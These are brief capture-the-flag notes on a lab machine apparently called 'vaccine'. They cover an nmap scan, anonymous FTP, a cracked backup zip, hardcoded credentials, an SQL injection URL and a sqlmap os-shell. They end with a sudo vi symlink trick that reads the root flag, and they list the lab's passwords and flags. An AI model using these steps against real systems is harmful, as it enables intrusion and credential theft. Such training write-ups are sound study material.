Nmap
Starting Nmap 7.94 ( https://nmap.org  ) at 2024-01-02 22:41 GMT                                                                        
Nmap scan report for 10.129.153.91                                                                                                     
Host is up (0.14s latency).                                                                                                            
Not shown: 997 closed tcp ports (reset)                                                                                                
PORT   STATE SERVICE VERSION                                                                                                           
21/tcp open  ftp     vsftpd 3.0.3                                                                                                      
| ftp-syst:                                                                                                                            
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.15.80
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit 
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.92 seconds

FTP has backup.zip file which is encrypted

Used fcrackzip to get password: 741852963

Contains index.php with hardcoded creds - admin:qwerty789(2cb42f8734ea607eefed3b70af13bbd3)

http://10.129.153.91/dashboard.php?search=zeus%27 (vulnerable to SQLi)

Using SQLMap, I can use the os-shell flag to get shell
Extracted DB credentials using os-shell
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

Credentials
admin:qwerty789
postgres:P@s5w0rd!

Flags
user: ec9b13ca4d6229cd5cc1e09980965bf7
root: dd6e058e814260bc70e9bbdef2715849


sudo -l contains
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf


Used ln to create a symlink of the root file to the pg_hba.conf file and then read it with vi
   46  ln -s /root/root.txt /etc/postgresql/11/main/pg_hba.conf
      47  sudo  /bin/vi /etc/postgresql/11/main/pg_hba.conf
